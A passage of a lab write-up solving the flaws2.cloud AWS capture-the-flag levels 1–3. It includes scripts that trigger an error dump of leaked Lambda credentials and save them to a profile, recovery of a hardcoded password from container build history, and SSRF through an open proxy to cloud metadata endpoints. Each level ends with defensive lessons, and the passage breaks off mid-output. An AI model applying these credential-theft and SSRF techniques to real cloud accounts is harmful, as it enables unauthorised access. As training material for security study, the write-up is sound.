Lab - CTF: flaws2.cloud [attacker and defender]
[toc]
CTF: flaws2.cloud
Attacker Track
Level 1 - source code & API input error
For this level, you'll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute forcing it won't help.
https://level1.flaws2.cloud/
aws s3 ls s3://level1.flaws2.cloud/
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
aws s3 ls s3://level1.flaws2.cloud/ \
--profile default
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
- give the wrong code
# code: 1234
https://level1.flaws2.cloud/index.htm?incorrect
# The input validation is only done by the javascript. Get around it and pass a pin code that isn't a number.
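Since that check only runs in the browser, you can call the API endpoint (the form action shown in the source below) directly with a non-numeric code; a minimal sketch:
curl 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=a'
# the backend responds with an error page that dumps its environment variables (shown further below)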
- source code
<body>
<div class="content">
<div class="row">
<div class="col-sm-12">
<center><h1>Level 1</h1></center>
<script type="text/javascript">
// There is a client-side check on the parameter, which needs to be a number.
// This suggests that the backend application only accepts numbers.
function validateForm() {
var code = document.forms["myForm"]["code"].value;
if (! ( !isNaN(parseFloat(code)) && isFinite(code)) ) {
alert("Code must be a number");
return false;
}
}
</script>
<!-- Form data is validated as follows: -->
<form name="myForm" action="https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1" onsubmit="return validateForm()">
Code:
<input type="text" name="code" value="1234">
<input type="submit" value="Submit">
</form>
</div>
</div>
</div>
<script type="text/javascript">
if (window.location.search.substring(1).includes("incorrect")) {
document.getElementById("incorrect").innerHTML = "<b style='background-color:#ffbabf; border-radius:3px; border: 2px solid #adadad; padding:5px;'>Incorrect. Try again.</b>";
}
</script>
</body>
</html>
<!-- the form submitting a request to https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=1234 -->
<!-- change the parameter https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=a -->
<!-- https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?a=a -->
Error, malformed input
{
"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"LANG":"en_US.UTF-8","TZ":":UTC",
"_HANDLER":"index.handler",
"LAMBDA_TASK_ROOT":"/var/task",
"LAMBDA_RUNTIME_DIR":"/var/runtime",
"AWS_REGION":"us-east-1",
"AWS_DEFAULT_REGION":"us-east-1",
"AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/level1",
"AWS_LAMBDA_LOG_STREAM_NAME":"2021/01/25/[$LATEST]8a9f5ac2839044cb8a620bcb9cb70ed1",
"AWS_LAMBDA_FUNCTION_NAME":"level1",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128",
"AWS_LAMBDA_FUNCTION_VERSION":"$LATEST",
"_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2",
"_AWS_XRAY_DAEMON_PORT":"2000",
"AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2:2000",
"AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR",
"_X_AMZN_TRACE_ID":"Root=1-600e5095-29b6c96c385001134d332a25;Parent=4e64534f4cbdf814;Sampled=0",
"AWS_EXECUTION_ENV":"AWS_Lambda_nodejs8.10",
"AWS_LAMBDA_INITIALIZATION_TYPE":"on-demand",
"NODE_PATH":"/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
"AWS_ACCESS_KEY_ID":"ASIAZQNB3KHGKLHAFAAT",
"AWS_SECRET_ACCESS_KEY":"+LceTa5RtXh+OlVEnXMLyaq2QXwve67hjp6ksviU",
"AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjEEsaCXVzLWVhc3QtMSJHMEUCIQCcaAlYq0OSI2qGz+PICgco09jMSVNgGKLU8SxVUEHPHAIgOv0OZTFJWs4fAuxulHpgDeYrxBPcN0Wapi4WaXnADhgqxQEIMxACGgw2NTM3MTEzMzE3ODgiDGiNRGqIak8fzySIayqiAR0IAnD/tBb54jELO69AhP4CQu3eJXF9pD+q22CT+14pjX3XS6oiqJoR2DS5XDOz1pxjtFt0hBkpqALPZOyh0Us1/cvAnPxL7THpdK7VPa8sMxomx+uONY7d7RV9IT33YC3JXtI1hO83x+NIxod13MYnE1Zqle0bidcB85aWvvlc/HftkP/hj4MfxqMcnoWMDYZTmc+6sVFuIongz4R1goIGYDD6tsGABjrgAVHkPQTsWYuVouK5nsGM4qcvcr3ITzhEnDukL6EAwrT9nWKkBkVE8B8/92ZOdxouAj3XxYLugJIgk96T2pT816MsGYvWbrYe3O9UOJFZ3OGJoCKtsSmNJE/S95JLCVJ+leaUvRuZnSm7NyrpX9viOju2KoiZVpDUx9MsmW39lrMA4ee5GfptC7UKVlxoyxVp0e/LFz4gGxMz3kVx9COPdt0cDD+UiB8enmOsoLiRv5XcLdE0A2NkZFm0MhrTcgc5PR/smtp/78ueppUPIevuvilZUUCnAEhrpqaelzzxa2je"}
- Configure the AWS credentials
$ aws s3 ls s3://level1.flaws2.cloud/ --profile flaws2
# PRE img/
# 2018-11-20 15:55:05 17102 favicon.ico
# 2018-11-20 21:00:22 1905 hint1.htm
# 2018-11-20 21:00:22 2226 hint2.htm
# 2018-11-20 21:00:22 2536 hint3.htm
# 2018-11-20 21:00:23 2460 hint4.htm
# 2018-11-20 21:00:17 3000 index.htm
# 2018-11-20 21:00:17 1899 secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
https://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
# The next level is at https://level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
Script
#!/bin/bash
INFILE=~/.aws/credentials
PROFILE='flaws2'
res=`curl -s 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=x' | tail -n1`
AWS_ACCESS_KEY_ID=`echo $res | jq -r .AWS_ACCESS_KEY_ID`
AWS_SECRET_ACCESS_KEY=`echo $res | jq -r .AWS_SECRET_ACCESS_KEY`
AWS_SESSION_TOKEN=`echo $res | jq -r .AWS_SESSION_TOKEN`
AWS_REGION=`echo $res | jq -r .AWS_REGION`
echo "[$PROFILE]
REGION = $AWS_REGION
AWS_ACCESS_KEY_ID = $AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = $AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN = $AWS_SESSION_TOKEN
" | crudini --merge $INFILE
echo "Set creds for profile $PROFILE in $INFILE"
aws s3 ls s3://level1.flaws2.cloud/ \
--profile $PROFILE
echo "list the S3"
Lesson learned
Whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254, AWS Lambda obtains those credentials from environment variables.
- Developers will often dump environment variables when error conditions occur in order to help them debug problems.
- This is dangerous, as sensitive information can sometimes be found in environment variables.
- The IAM role had privileges to list the contents of a bucket, which wasn't needed for its operation.
- Best practice: follow a Least Privilege strategy.
- You shouldn't rely on input validation happening only on the client side or at some point upstream from your code.
- AWS applications, especially serverless ones, are composed of many building blocks all chained together.
- Developers sometimes assume that something upstream has already performed input validation. In this case, the client data was validated by JavaScript (which could be bypassed), then passed into API Gateway, and finally to the Lambda.
- Applications are often more complex than that, and these architectures can change over time, possibly breaking assumptions about where validation is supposed to occur.
Level 2 - public container image & build history
This next level is running as a container at https://container.target.flaws2.cloud/. Just like S3 buckets, other resources on AWS can have open permissions. I'll give you a hint that the ECR (Elastic Container Registry) is named "level2".
https://level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
- If an ECR is public, list the images
aws ecr list-images --repository-name REPO_NAME --registry-id ACCOUNT_ID
# get account id
aws sts get-caller-identity \
--profile flaws2
# {
#   "UserId": "AROAIBATWWYQXZTTALNCE:level1",
#   "Account": "653711331788",
#   "Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1"
# }
# get the correct region:
dig level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
# ;; ANSWER SECTION:
# level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud. 5 IN A 52.217.37.195
nslookup 52.217.37.195
# Server: 192.168.1.1
# Address: 192.168.1.1#53
# Non-authoritative answer:
# 195.37.217.52.in-addr.arpa name = s3-website-us-east-1.amazonaws.com.
# list the images with:
aws ecr list-images \
--repository-name level2 \
--registry-id 653711331788 \
--region us-east-1
# {
#   "imageIds": [
#     { "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
#       "imageTag": "latest" }
#   ]
# }
- The image is public.
- Two choices:
- pull it locally with Docker and investigate it with Docker commands,
- or inspect it manually with the AWS CLI.
Option 1: Using the docker commands
# download it locally
# Retrieves a token that is valid for a specified registry for 12 hours
# and then it prints a docker login command with that authorisation token.
aws ecr get-login-password \
--profile flaws2 \
--region us-east-1 \
| docker login \
--username AWS \
--password-stdin \
653711331788.dkr.ecr.us-east-1.amazonaws.com
# Login Succeeded
# pull/download the image from the repository:
docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
# latest: Pulling from level2
# 7b8b6451c85f: Pull complete
# ...
# Digest: sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e
# Status: Downloaded newer image for 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
# 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
# verify it’s been pulled correctly:
docker image ls
# REPOSITORY TAG IMAGE ID CREATED SIZE
# 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2 latest 2d73de35b781 11 months ago 202M
# shows the final command executed and a number of read-only layers:
docker inspect 2d73de35b781
# [
# {
# "Id": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621",
# "RepoTags": [ "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest" ,
# "RepoDigests": [ "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2@sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e" ],
# "Parent": "",
# "Comment": "",
# "Created": "2018-11-27T03:32:59.959842964Z",
# "Container": "ac1212c533fd9920b36cf3518caeb27b07e5efca6d40a0cfb07acc94c3f02055",
# "ContainerConfig": {
# "Hostname": "ac1212c533fd",
# "Domainname": "",
# "User": "",
# "AttachStdin": false,
# "AttachStdout": false,
# "AttachStderr": false,
# "ExposedPorts": { "80/tcp": {} },
# "Tty": false,
# "OpenStdin": false,
# "StdinOnce": false,
# "Env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
# "Cmd": [
# "/bin/sh",
# "-c",
# "#(nop) ",
# "CMD ["sh" "/var/www/html/start.sh"]"
# ],
# "ArgsEscaped": true,
# "Image": "sha256:6bb13d45a562a2f15ca30b6a895698b27231a190049f1d4489aeba4fa86a75fe",
# "Volumes": null,
# "WorkingDir": "",
# "Entrypoint": null,
# "OnBuild": null,
# "Labels": {}
# },
# "DockerVersion": "18.09.0",
# "Author": "",
# "Config": {
# "Hostname": "",
# "Domainname": "",
# "User": "",
# "AttachStdin": false,
# "AttachStdout": false,
# "AttachStderr": false,
# "ExposedPorts": { "80/tcp": {} },
# "Tty": false,
# "OpenStdin": false,
# "StdinOnce": false,
# "Env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
# "Cmd": [ "sh", "/var/www/html/start.sh" ],
# "ArgsEscaped": true,
# "Image": "sha256:6bb13d45a562a2f15ca30b6a895698b27231a190049f1d4489aeba4fa86a75fe",
# "Volumes": null,
# "WorkingDir": "",
# "Entrypoint": null,
# "OnBuild": null,
# "Labels": null
# },
# "Architecture": "amd64",
# "Os": "linux",
# "Size": 201856589,
# "VirtualSize": 201856589,
# "GraphDriver": {
# "Data": {
# "LowerDir": "/var/lib/docker/overlay2/fc6a91db2d4e9928b7df0f74ce049d7a0318b8d3df12048067cacd660107babf/diff:/var/lib/docker/overlay2/1227f5684004759eeb508df0cc01170a20a0e4d1189f6d4eca5dd627ed5e73f4/diff:/var/lib/docker/overlay2/7758b82766621d50d099516d6d242fc2892cd4ece364501f513a748453cdb4fd/diff:/var/lib/docker/overlay2/8990a089d5838857b06357ebea16a0e27594cb53124cb9f9f38673c2f4c03ab2/diff:/var/lib/docker/overlay2/a977553c8a3ff13a444f69a8422dc6df967e8659ba1e4cb43ce90c25a37eec87/diff:/var/lib/docker/overlay2/449cb11583af58566ca399ad4322e1b428618edec8234a51d9060e94892664a7/diff:/var/lib/docker/overlay2/e596d0bb1784b3ce06c161a02b03afa161c5b035df3c4fb0a07cf3518273171d/diff:/var/lib/docker/overlay2/2e938647f50e15ebf4566306fdd99de281821b2a071ad91a032196f3bcdbfe16/diff:/var/lib/docker/overlay2/aea4d9fb324436155ca54672f24e822170c5360cefd32c56ad61db534695d458/diff",
# "MergedDir": "/var/lib/docker/overlay2/a4fc2ea923e396aa3bbca3c39601f34063e59404b5b5f922cb4d7b1e09866522/merged",
# "UpperDir": "/var/lib/docker/overlay2/a4fc2ea923e396aa3bbca3c39601f34063e59404b5b5f922cb4d7b1e09866522/diff",
# "WorkDir": "/var/lib/docker/overlay2/a4fc2ea923e396aa3bbca3c39601f34063e59404b5b5f922cb4d7b1e09866522/work"
# },
# "Name": "overlay2"
# },
# "RootFS": {
# "Type": "layers",
# "Layers": [
# "sha256:41c002c8a6fd36397892dc6dc36813aaa1be3298be4de93e4fe1f40b9c358d99",
# "sha256:647265b9d8bc572a858ab25a300c07c0567c9124390fd91935430bf947ee5c2a",
# "sha256:819a824caf709f224c414a56a2fa0240ea15797ee180e73abe4ad63d3806cae5",
# "sha256:3db5746c911ad8c3398a6b72aa30580b25b6edb130a148beed4d405d9c345a29",
# "sha256:1c1ac3ae43d53b452e0dfb320a5c22cf8ff5e8068a7ecef6779600d14ad4751b",
# "sha256:bc16ef0350ee1577dfe09696bff225b40d241b26a359c146ffd5746a8ce18931",
# "sha256:5db51ba604f0593199b4d8705a21fe6b1bc6cee503f7468539f6a80aa3cc4750",
# "sha256:4e7b9bca030ac43814d0a6c6afed36f70fc2bb01a9dd84705358f424af1dae1e",
# "sha256:5494da4989bbd817e20ead7cbaa8985d9907db95ea07b3e212e2e483de767f1d",
# "sha256:67df634e1db11f3a6533ed051811c8290b69d7104550617dcc79303304cc78bb"
# ]
# },
# "Metadata": { "LastTagTime": "0001-01-01T00:00:00Z" }
# }
# ]
# view the commands used to create all the layers when the docker container was built:
docker history 2d73de35b781
# IMAGE CREATED CREATED BY SIZE COMMENT
# 2d73de35b781 11 months ago /bin/sh -c #(nop) CMD ["sh" "/var/www/html/… 0B
# <missing> 11 months ago /bin/sh -c #(nop) EXPOSE 80 0B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:d29d68489f34ad718… 49B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:f8fd45be7a30bffa5… 614B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:fd3724e587d17e4bc… 1.89kB
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:b311a5fa51887368e… 999B
# <missing> 11 months ago /bin/sh -c htpasswd -b -c /etc/nginx/.htpass… 45B
# <missing> 11 months ago /bin/sh -c apt-get update && apt-get ins… 85.5MB
# <missing> 11 months ago /bin/sh -c #(nop) CMD ["/bin/bash"] 0B
# <missing> 11 months ago /bin/sh -c mkdir -p /run/systemd && echo 'do… 7B
# <missing> 11 months ago /bin/sh -c rm -rf /var/lib/apt/lists/* 0B
# <missing> 11 months ago /bin/sh -c set -xe && echo '#!/bin/sh' > /… 745B
# <missing> 11 months ago /bin/sh -c #(nop) ADD file:efec03b785a78c01a… 116MB
# the command to set up the password for HTTP Basic Authentication
# To get the full command
docker history 2d73de35b781 --no-trunc
# /bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password
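Since the image has no ENTRYPOINT, you can also poke around its filesystem by running it locally with an overridden command; a minimal sketch (paths taken from the layers above):
docker run -it --rm 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest /bin/bash
# then, inside the container, for example:
# cat /var/www/html/start.sh
# cat /etc/nginx/.htpasswd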
Option 2: Using the AWS CLI
aws ecr batch-get-image \
--repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
# This shows the multiple layers. We could download any one of them based on its digest:
# {
# "images": [
# {
# "registryId": "653711331788",
# "repositoryName": "level2",
# "imageId": {
# "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
# "imageTag": "latest"
# },
# "imageManifest": "{
# "schemaVersion": 2,
# "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
# "config": {
# "mediaType": "application/vnd.docker.container.image.v1+json",
# "size": 5359,
# "digest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
# },
# "layers": [
# {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
# "size": 43412182,
# "digest": "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580"},
# ...
# {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
# "size": 213,
# "digest": "sha256:4fbdfdaee9ae20c6e877bd57838c6f93336573195f4aafcdec36fb4c4358a935"}]}",
# "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json"
# }
# ],
# "failures": []
# }
# Then for a given digest, use:
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580" \
--profile flaws2 \
--region us-east-1
# {
# "downloadUrl": "https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/dc26-653711331788-58b3a0a8-1806-5777-1315-c2d788e36c12/f1bebb74-3af2-4d58-8bbe-cfec79c8ceb3?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAsdQOhmH4M61p6nNFud8rIbH3RwQb3gZ%2B57EWiWy7HIAiAK0dkKIkWSXt7Ya4zul8lhtAj%2BM7mGJbvj6S3VOB2aZSrvAghvEAIaDDU5MTEwNTkxNDk1MiIMGlBfaYcxW5mJ0cdIKswC2wjblU4%2FgtiyOYTEsNfxhTopf4aQyWzYGYGUdm079DUhfDhTg14x4IuTj4N9mMsFYk7HdVb0iNIeNiTMqM0R%2FpM13XOOwOU7huxSwJdc9zIpFw0wXrO16vSFo0zpnxCktAusBNaFgg%2Bp6LW4IbfdE6N5SmHSV9HEFB5Ds7aMXVJsHtu%2FL5Q0jD9eKlNepJ6hdImoODDgiWbqbLi%2BF%2BSKomBHfgWbF5ZlV6%2BrU24F9sAcy%2FXy3%2BgqyUlXzuaVY0uKLKrDoFRei1uqn49sPS3uWyKfa18CxJW8%2BAyi1M48fd3PhKO8d8nY6IqIAINTddIf4rD9nMWwWzDJjQdDP32i25qoobiX9P%2Feg8UYR5PlHeddd5PmxH4MfJ4svozjlxt9AHw%2FK4YlC%2FfRi6qmSYO4%2Fqck7YWRA%2BwDm1IaeWJLYpH5RmYfHZjkyHslOucw4MbOgAY66AHOu3rmP4tZ38mhLyrDvENoEpjQ5r1OE%2BP5gpOc%2FnWU0X4tMldfSkS%2BnLLmSJdI2AObR97Kot%2BeYmEj6lbMDEHcuJZSuGIlSsFDgehXb%2FT8GOGmy6MNqXi4hxT%2FsWMcdr8%2Bte%2F05er97ygPHST1pgIgWa%2F2oirALPRXC1%2BKdSut4bFpffaOyzT4XKINUkg8ultpfKmAVyzAVP92LTkEY5Cz5QsagZRUqXUcCXBlgigGW30UCszp1NJHzK1hnskBP8fh9DMbUsIl70iM3THrCR5UXDEvF0GbqgYZ0l1bp1W0zA5ZUodA%2Fo1r&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20210129T061958Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Credential=ASIAYTIFIPBEOQ76MFZB%2F20210129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=953cc74b0fdbdb03046f3cafddb656527ff5114138c947efcf83a8f012531ef0",
# "layerDigest": "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580"
# }
wget "https://prod-us-east-1-st...a599458" -O layer.tar.gzip
# or just download the config file:
wget "https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/dc26-653711331788-58b3a0a8-1806-5777-1315-c2d788e36c12/f1bebb74-3af2-4d58-8bbe-cfec79c8ceb3?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAsdQOhmH4M61p6nNFud8rIbH3RwQb3gZ%2B57EWiWy7HIAiAK0dkKIkWSXt7Ya4zul8lhtAj%2BM7mGJbvj6S3VOB2aZSrvAghvEAIaDDU5MTEwNTkxNDk1MiIMGlBfaYcxW5mJ0cdIKswC2wjblU4%2FgtiyOYTEsNfxhTopf4aQyWzYGYGUdm079DUhfDhTg14x4IuTj4N9mMsFYk7HdVb0iNIeNiTMqM0R%2FpM13XOOwOU7huxSwJdc9zIpFw0wXrO16vSFo0zpnxCktAusBNaFgg%2Bp6LW4IbfdE6N5SmHSV9HEFB5Ds7aMXVJsHtu%2FL5Q0jD9eKlNepJ6hdImoODDgiWbqbLi%2BF%2BSKomBHfgWbF5ZlV6%2BrU24F9sAcy%2FXy3%2BgqyUlXzuaVY0uKLKrDoFRei1uqn49sPS3uWyKfa18CxJW8%2BAyi1M48fd3PhKO8d8nY6IqIAINTddIf4rD9nMWwWzDJjQdDP32i25qoobiX9P%2Feg8UYR5PlHeddd5PmxH4MfJ4svozjlxt9AHw%2FK4YlC%2FfRi6qmSYO4%2Fqck7YWRA%2BwDm1IaeWJLYpH5RmYfHZjkyHslOucw4MbOgAY66AHOu3rmP4tZ38mhLyrDvENoEpjQ5r1OE%2BP5gpOc%2FnWU0X4tMldfSkS%2BnLLmSJdI2AObR97Kot%2BeYmEj6lbMDEHcuJZSuGIlSsFDgehXb%2FT8GOGmy6MNqXi4hxT%2FsWMcdr8%2Bte%2F05er97ygPHST1pgIgWa%2F2oirALPRXC1%2BKdSut4bFpffaOyzT4XKINUkg8ultpfKmAVyzAVP92LTkEY5Cz5QsagZRUqXUcCXBlgigGW30UCszp1NJHzK1hnskBP8fh9DMbUsIl70iM3THrCR5UXDEvF0GbqgYZ0l1bp1W0zA5ZUodA%2Fo1r&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20210129T061958Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Credential=ASIAYTIFIPBEOQ76MFZB%2F20210129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=953cc74b0fdbdb03046f3cafddb656527ff5114138c947efcf83a8f012531ef0" -O config
cat config | jq '. | fromjson'
# {
# "created": "2018-11-27T03:32:58.202361504Z",
# "created_by": "/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password"
# },
# go to https://container.target.flaws2.cloud/
# Read about Level 3 at level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
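The htpasswd command recovered from the build history gives working HTTP Basic Auth credentials for the container's site; a quick check with curl (sketch):
curl -u flaws2:secret_password https://container.target.flaws2.cloud/
# should return the Level 3 page instead of a 401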
script
#!/bin/bash
INFILE=~/.aws/credentials
PROFILE='flaws2'
REPONAME='level2'
REGION='us-east-1'
RES=`curl -s 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=x' | tail -n1`
AWS_ACCESS_KEY_ID=`echo $RES | jq -r .AWS_ACCESS_KEY_ID`
AWS_SECRET_ACCESS_KEY=`echo $RES | jq -r .AWS_SECRET_ACCESS_KEY`
AWS_SESSION_TOKEN=`echo $RES | jq -r .AWS_SESSION_TOKEN`
AWS_REGION=`echo $RES | jq -r .AWS_REGION`
echo "[$PROFILE]
REGION = $AWS_REGION
AWS_ACCESS_KEY_ID = $AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = $AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN = $AWS_SESSION_TOKEN
" | crudini --merge $INFILE
echo "-------Set creds for profile $PROFILE in $INFILE"
IDENTITY=`aws sts get-caller-identity \
--profile $PROFILE`
ACCOUNTID=`echo $IDENTITY | jq -r .Account`
echo "-------profile $PROFILE 's account id is $ACCOUNTID"
IMAGE=`aws ecr list-images \
--repository-name $REPONAME \
--registry-id $ACCOUNTID \
--region $REGION \
--profile $PROFILE`
IMAGETAGINFO=`echo $IMAGE | jq -r .imageIds[].imageTag`
echo "-------get the images tag $IMAGETAGINFO"
LAYERINFO=`aws ecr batch-get-image \
--repository-name $REPONAME \
--registry-id $ACCOUNTID \
--image-ids imageTag=$IMAGETAGINFO | jq '.images[].imageManifest | fromjson'`
CONFIGDIG=`echo $LAYERINFO | jq -r '.config.digest'`
echo "-------image config digest: $CONFIGDIG"
LAYERURL=`aws ecr get-download-url-for-layer \
--repository-name $REPONAME \
--registry-id $ACCOUNTID \
--layer-digest $CONFIGDIG \
--region $REGION \
--profile $PROFILE | jq -r .downloadUrl`
echo "-------download the image config blob $CONFIGDIG"
wget "$LAYERURL" -O config
echo "-------check the config file"
cat config | jq .
Lesson learned
There are lots of other resources on AWS that can be public
- but they are harder to brute-force because you have to include not only the name of the resource, but also the Account ID and region.
- They also can't be found via DNS records.
- However, it is still best to avoid having public resources.
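To audit your own account for this, one approach is to loop over your ECR repositories and dump any repository policies, then look for a wildcard Principal; a minimal sketch, assuming your own credentials are in the default profile:
for repo in $(aws ecr describe-repositories --query 'repositories[].repositoryName' --output text); do
  echo "== $repo"
  aws ecr get-repository-policy --repository-name "$repo" --query policyText --output text 2>/dev/null
done
# any policy containing "Principal": "*" is open to the world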
Level 3 - proxy metadata to iam
The container's webserver you got access to includes a simple proxy that can be accessed with:
- https://container.target.flaws2.cloud/proxy/https://flaws.cloud
- or https://container.target.flaws2.cloud/proxy/https://neverssl.com
https://level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
- The proxy program is actually present in the container image we pulled earlier.
docker inspect 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2
# no ENTRYPOINT, and CMD = "sh /var/www/html/start.sh"
root@e247007162e8:/var/www/html# cat proxy.py
https://container.target.flaws2.cloud/proxy/file:////var/www/html/proxy.py
# import SocketServer
# import SimpleHTTPServer
# import urllib
# import os
# PORT = 8000
# class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
# def do_GET(self):
# self.send_response(200)
# self.send_header("Content-type", "text/html")
# self.end_headers()
# # Remove starting slash
# self.path = self.path[1:]
# # Read the remote site
# response = urllib.urlopen(self.path)
# the_page = response.read(8192)
# # Return it
# self.wfile.write(bytes(the_page))
# self.wfile.close()
# httpd = SocketServer.ForkingTCPServer(('', PORT), Proxy)
# print "serving at port", PORT
# httpd.serve_forever()
root@e247007162e8:/var/www/html# cat /etc/nginx/sites-available/default
# server {
# listen 80 default_server;
# listen [::]:80 default_server;
# root /var/www/html;
# index index.html index.htm;
# merge_slashes off;
# server_name _;
# location / {
# try_files $uri $uri/ =404;
# auth_basic "Restricted Content";
# auth_basic_user_file /etc/nginx/.htpasswd;
# }
# location /debug {
# #perl_set $debug 'sub { return %ENV; }';
# #return 200 '${debug}';
# return 200 'debug';
# }
# location ~* ^/proxy/(.*)$ {
# limit_except GET {
# deny all;
# }
# limit_req zone=one burst=1;
# set $proxyuri '$1';
# proxy_limit_rate 4096;
# proxy_set_header X-Real-IP $remote_addr;
# proxy_set_header Host 'localhost';
# resolver 8.8.8.8;
# proxy_pass https://127.0.0.1:8000/$proxyuri;
# }
# }
Just like before, the proxy retrieves and returns any URL we desire.
This enables SSRF (server-side request forgery) and potentially lets us pivot within this account.
- to query the ECS task’s Metadata:
https://container.target.flaws2.cloud/proxy/169.254.169.254/
https://container.target.flaws2.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials
https://container.target.flaws2.cloud/proxy/https://169.254.169.254/
# Empty response.
# That IP is for EC2 instances, not ECS Tasks.
# ECS Task Metadata Endpoints.
https://container.target.flaws2.cloud/proxy/https://169.254.170.2/v2/metadata
{
"Cluster":"arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"TaskARN":"arn:aws:ecs:us-east-1:653711331788:task/2742123a-ed28-4a62-b08b-8cc33d932f26",
"Family":"level3",
"Revision":"3",
"DesiredStatus":"RUNNING",
"KnownStatus":"RUNNING",
"Containers":[
{
"DockerId":"022f0bb003e003d3ef080d6151ff72214a3f46a7f693439ee2f7a1ae11eed956",
"Name":"~internal~ecs~pause",
"DockerName":"ecs-level3-3-internalecspause-eca0cefcdde9c18b5d00",
"Image":"fg-proxy:tinyproxy",
"ImageID":"",
"Labels":{
"com.amazonaws.ecs.cluster":"arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"com.amazonaws.ecs.container-name":"~internal~ecs~pause",
"com.amazonaws.ecs.task-arn":"arn:aws:ecs:us-east-1:653711331788:task/2742123a-ed28-4a62-b08b-8cc33d932f26",
"com.amazonaws.ecs.task-definition-family":"level3",
"com.amazonaws.ecs.task-definition-version":"3"
},
